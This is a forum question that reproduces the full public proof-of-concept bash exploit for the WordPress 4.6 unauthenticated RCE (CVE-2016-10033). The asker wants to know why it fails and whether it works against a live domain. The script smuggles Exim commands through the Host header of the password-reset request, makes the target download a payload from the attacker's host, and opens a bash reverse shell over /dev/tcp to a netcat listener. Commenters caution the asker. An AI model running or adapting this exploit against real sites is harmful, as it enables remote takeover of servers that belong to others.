# WordPress 4.6 - Unauthenticated Remote Code Execution

Tags: php, wordpress, bash, security, exploit

I have a live presentation of this exploit: 
https://www.exploit-db.com/exploits/41962/

I installed wp 4.6 on my domain, than installed kali linux, however when I execute the bash code I get this output.

[image: output]

I checked robots status, allowed all robots to access website.

here you can find the bash script details
https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

Should I change rev_host="...", I tried website's IP, didn't change the output.

```
#!/bin/bash
#
#      __                     __   __  __           __
#     / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
#    / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
#   / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  )
#  /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/
#            /____/
#
#
# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
# CVE-2016-10033
#
# wordpress-rce-exploit.sh (ver. 1.0)
#
#
# Discovered and coded by
#
# Dawid Golunski (@dawid_golunski)
# https://legalhackers.com
#
# ExploitBox project:
# https://ExploitBox.io
#
# Full advisory URL:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
#
# Exploit src URL:
# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
#
#
# Tested on WordPress 4.6:
# https://github.com/WordPress/WordPress/archive/4.6.zip
#
# Usage:
# ./wordpress-rce-exploit.sh target-wordpress-url
#
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
#
#
#                        .;lc'
#                    .,cdkkOOOko;.
#                 .,lxxkkkkOOOO000Ol'
#             .':oxxxxxkkkkOOOO0000KK0x:'
#          .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
#       ':oxxxxxxxxxxo;.       .:oOKKKXXXNNNNOl.
#      '';ldxxxxxdc,.              ,oOXXXNNNXd;,.
#     .ddc;,,:c;.         ,c:         .cxxc:;:ox:
#     .dxxxxo,     .,   ,kMMM0:.  .,     .lxxxxx:
#     .dxxxxxc     lW. oMMMMMMMK  d0     .xxxxxx:
#     .dxxxxxc     .0k.,KWMMMWNo :X:     .xxxxxx:
#     .dxxxxxc      .xN0xxxxxxxkXK,      .xxxxxx:
#     .dxxxxxc    lddOMMMMWd0MMMMKddd.   .xxxxxx:
#     .dxxxxxc      .cNMMMN.oMMMMx'      .xxxxxx:
#     .dxxxxxc     lKo;dNMN.oMM0;:Ok.    'xxxxxx:
#     .dxxxxxc    ;Mc   .lx.:o,    Kl    'xxxxxx:
#     .dxxxxxdl;. .,               .. .;cdxxxxxx:
#     .dxxxxxxxxxdc,.              'cdkkxxxxxxxx:
#      .':oxxxxxxxxxdl;.       .;lxkkkkkxxxxdc,.
#          .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
#             .':oxxxxxxxxx.ckkkkkkkkxl,.
#                 .,cdxxxxx.ckkkkkxc.
#                    .':odx.ckxl,.
#                        .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------



rev_host="192.168.57.1"


function prep_host_header() {
      cmd="$1"
      rce_cmd="\${run{$cmd}}";

      # replace / with ${substr{0}{1}{$spool_directory}}
      #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
      rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"

      # replace ' ' (space) with
      #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
      rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
      #return "target(any -froot@localhost -be $rce_cmd null)"
      host_header="target(any -froot@localhost -be $rce_cmd null)"
      return 0
}


#cat exploitbox.ans
intro="
DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
intro2="
ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
echo "$intro"  | base64 -d
echo "$intro2" | base64 -d

if [ "$#" -ne 1 ]; then
echo -e "Usage:\n$0 target-wordpress-url\n"
exit 1
fi
target="$1"
echo -ne "\e[91m[*]\033[0m"
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo


if [ "$choice" == "y" ]; then

echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
echo -e "\e[92m[+]\033[0m Connected to the target"

# Serve payload/bash script on :80
RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!

# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"

# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
echo -e "\n\e[92m[+]\033[0m Payload executed!"

echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
nc -vv -l 1337
echo
else
echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
exit 0

fi


echo "Exiting..."
exit 0
```

There is video demo: https://www.youtube.com/watch?v=ZFt_S5pQPX0
Is this script is only available for local machines?
Or can I do on my live domain, If I can how?
Thanks...

Comment: The exploit you linked requires a specific (and kinda misconfigured) webserver and a specific mail transfer agent. Your task might be a little more complicated than changing the ip.

Comment: A reverse shell attack requires the attacking (eg your kali linux box) machine to be available over internet. `rev_host` is therefor likely to mean your machines public ip. You will also need to have the correct ports open etc. If you dont understand what the bash script is doing, dont run it.

Comment: @Steve You're right. I should do more research. So, I can't attack a domain like website.com